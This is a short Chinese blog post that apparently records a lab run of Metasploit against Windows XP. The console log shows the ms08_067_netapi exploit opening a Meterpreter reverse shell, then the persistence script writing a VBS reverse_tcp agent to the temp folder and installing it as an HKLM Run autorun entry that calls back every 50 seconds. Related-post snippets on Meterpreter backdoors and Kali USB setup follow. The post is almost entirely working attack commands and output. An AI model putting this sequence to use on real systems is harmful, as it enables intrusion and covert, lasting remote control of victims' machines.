metasploit控制持久化

最新推荐文章于 2024-05-01 06:14:55 发布
最新推荐文章于 2024-05-01 06:14:55 发布
阅读量4.6k 收藏
点赞数
分类专栏: backtrack metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/8861473
版权 
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.11:4444 
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.142:1071) at 2013-04-27 19:35:42 -0400

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.142
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-9743DD32E3_20130427.3635/ROOT-9743DD32E3_20130427.3635.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.142 LPORT=443
[*] Persistent agent script is 612411 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\CmABaQMMkKnlD.vbs
[*] Executing script C:\WINDOWS\TEMP\CmABaQMMkKnlD.vbs
[+] Agent executed with PID 456
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\dbmgcLdVJ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\dbmgcLdVJ
meterpreter >


持久化后,XP每隔50秒左右,出现如下:



feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
meterpreter 持久后门
01-02 680
创建持久后门 当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门。创建持久后门的具体操作步骤如下所示。 (1)激活Meterpreter会话。执行命令如下...
渗透之——Metasploit访问控制持久化
冰河的专栏
01-12 3269
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358463 工具:Metasploit 为了实现这一点,可以选择在目标计算机上添加一个新的用户,也可以选择使用MSF中persistence模块。 运行persistence模块可以通过在目标计算机上安装一个永久性的后门来实现访问控制持久化。这样,即使有一天目标计算机修...
2024年最全Windows权限维持技术总结、复现_cs权限维持
最新发布
2401_84281629的博客
05-01 901
Windows 实现计划任务主要有 at 与 schtasks 两种方式,通过计划任务可以定时启动后门程序at 适用于windows 2000、2003、xp,schtasks适用于windows >= 2003利用 windows 开机启动项实现权限的维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式影子账户,顾名思义就像影子一样,跟主体是一模一样的,通过建立影子账户,可以获得跟管理员一样的权限,它无法通过普通命令进行查询,只能在注册表中找到其详细信息。
制作持久化的 Kali U盘
颹蕭蕭
01-21 3437
参考官方教程 https://www.kali.org/docs/usb/kali-linux-live-usb-install/ 准备材料 一个格式化好的 u 盘,我用的是 32 G Kingston Data Traveler 2.0 下载好的 kali-linux-2020.4-live-amd64.iso 官网推荐的 Etcher 软件:https://www.balena.io/etcher/ 完了就是软件一键烧录。。。 ...
【物联网安全】可USB驱动的持久化的Kali Linux
qq_52592423的博客
07-14 5087
一般来说,在传统安全测试如Web安全和App安全中,会倾向于使用VMware Workstation来启动一个Kali Linux虚拟机(以下简称VM)进行一些工具的使用。而在IoT安全测试中,会涉及大量外接工具/设备的使用,在VM 中运行这些工具并执行到 VM 的 USB 接口会存在一些 潜在影响,导致出错。为了解决这一问题,我们把U盘配置为持久化(Persistence)储存的Kali Linux便携的口袋版,这将绕过在 VM 中使用 Kali 的潜在限制,且不影响现有的笔记本工作(系统)。...
U盘Kali安装持久化及完善
zjgwh的博客
02-27 1658
接下来就是关机重启,验证是否加密持久化,选择”Live system with USB Encrypted Persistence“模式进入,等待屏幕载入进程,一会到如下界面,会提示要输入密码,这里就是当时加密分区的时候设定的密码,输入密码,进入系统,验证是否可持续化的方式和上面一样,创建文件,保持,重启进入,看原来的文件是否还存在。执行命令后,会提示选择,一定要大写的”YES“,然后输入自己设定的密码,密码在屏幕上不会有任何显示,输入确认后,会再提示确认密码,确认后,就表示sdc3加密成功。
metasploit-framework-6.3.34.zip
09-17
5. 后渗透操作:一旦成功入侵,Metasploit提供了后门模块,可以进行持久化控制,进行进一步的信息收集和横向移动。 三、Metasploit的更新与维护 6.3.34版本的发布意味着开发者们持续在修复已知问题、增强稳定性和...
Metasploit.zip
08-11
4. **会话管理**:一旦成功建立会话,Metasploit可以帮助你控制目标系统,执行命令、上传/下载文件、持久化连接等。 5. **自定义脚本**:Metasploit支持Ruby编写自定义脚本,可以根据需求扩展其功能。 四、使用...
最新metasploit
04-18
Payload可以是任何代码,如命令执行、反向shell或者持久化模块,旨在实现攻击者的目标,比如获取远程访问权限。 3. **Auxiliary modules**: 辅助模块提供了一组多样的功能,如扫描、信息收集、认证绕过等,它们并不...
Metasploit渗透测试指南 修订版
09-21
此外,还会介绍payload的选择和定制,以及如何实现持久化访问,如创建后门。 对于post-exploitation阶段,书中会介绍如何在取得系统控制权后进行进一步的操作,如提升权限、收集敏感信息、横向移动和反取证。这些...
metasploit
10-04
2. **Payloads**:一旦漏洞被成功利用,Payload就是执行的代码,可以是简单的命令执行,也可以是更复杂的持久化后门。 3. **Post exploitation**:在成功入侵后,这部分模块用于进一步控制和利用目标系统。 4. **...
制作 Kali Linux 随身 U 盘并实现持久化
热门推荐
人人都懂物联网
08-27 1万+
制作 Kali Linux 随身 U 盘 Kali Linux 的前身是 BackTrack Linux 发行版。Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。它由 Offensive Security Ltd 维护和资助,最先由 Offensive Security 的 MatiAharoni 和 Devon Kearns 通过重写 Back Track 来完成。Back Track 是基于 Ubuntu 的一个 Linux 发行版。 Kali
u盘安装kali并且持久化
weixin_31501115的博客
06-21 5974
首先准备三个东东(提供的软件下载地址均为云盘地址,也可自行官网下载最新版) kali U盘ISO镜像:链接: https://pan.baidu.com/s/1n0eD4hs_KCplLmDu3b1ztA 提取码: 9zcw U盘烧入工具:链接: https://pan.baidu.com/s/1yNWJyTRfl6PkcwULJQDk3A 提取码: i59s 系统分区工具:链接: https://pan.baidu.com/s/1du7KTQ0n_dkjBRPnt_Ya1g 提取码: 5y5x开始烧制u盘
【KALI】自制U盘版KALI(即插即用具有可持久化功能)
qq_25426559的博客
04-17 6084
本文介绍了如何制作U盘版即插即用的Kali,且配有持久化功能。
将Kali Linux安装到优盘并实现文件的持久存储(2)
henter的专栏
07-18 2193
本文介绍了将Kali Linux安装到优盘,并实现文件的持久存储的方法。
3.Kali_linux 安装持久化加密USB安装
分享学习网络的点点滴滴
10-19 210
Kali_linux 安装持久化加密USB安装一、LUKS:LINUX unified key setup二、将镜像刻录到U盘三、持久加密USB安装 一、LUKS:LINUX unified key setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows-DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker 二、将镜像刻录到U盘 Dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1M &nbsp
kali live持久化的最新方法(以联想小新潮为例)
zorchp
02-18 1321
最近找到一块闲置的 u 盘, 想着重新折腾一下 Kali Linux 的 USB 持久化, 其实步骤不复杂, 但是 Windows 和联想小新潮 7000 的 bios 设置比较迷(可能是因为我之前装过双系统, 很多设置都要变)
Kali持久加密USB的制作
qq_43610436的博客
02-11 3704
我们知道,Kali有众多的启动项,其中Live启动项是一种为用户提供操作体验的启动方式,正因为此,它不能进行更新升级,也不能保存我们对系统的任何修改。但是还有两种启动方式,它们基于Live模式而成,但可以对系统修改的结果进行保存,它们就是Kali Linux Live USB Persistence(USB持久)和Kali Linux Live USB Encrypted Persisten...
Kali最新2020.1版本之U盘启动加密与持久化存储制作流程
WeiyiGeek 唯一极客IT知识分享
03-17 659
0x00 前言0x01 安装流程0x02 入坑解决0x00 前言描述:最近在家开始将原来所学的一些渗透知识以及渗透工具重新整理了一边,加之个人对Kali OS是非常的喜欢,在渗透测试中可谓是一把利器同时也是做安全人员必不可少的工具, 同时Kali已经更新到2020.1版本这使得我迫不及待的想体验一把,所以写了这篇文章;环境工具准备:Kali-Live镜像: kali-li...
Metasploit工作原理
05-22
4. 后渗透:Metasploit提供了一系列的post-exploitation模块,可以帮助攻击者进一步控制目标系统,例如获取敏感信息、横向移动、持久化等。 总的来说,Metasploit可以帮助攻击者快速发现目标系统中的漏洞,并利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值